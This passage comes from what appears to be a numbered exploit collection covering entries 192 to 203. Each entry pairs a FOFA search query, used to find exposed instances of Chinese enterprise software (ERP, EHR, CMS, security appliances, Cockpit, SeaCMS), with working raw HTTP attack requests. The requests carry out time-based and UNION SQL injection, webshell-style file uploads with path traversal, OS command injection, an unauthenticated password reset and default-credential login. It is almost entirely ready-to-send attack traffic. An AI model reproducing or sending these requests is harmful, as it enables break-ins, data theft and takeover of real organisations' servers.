User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}


193. 山石网科云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星 internet access behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正 omni-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
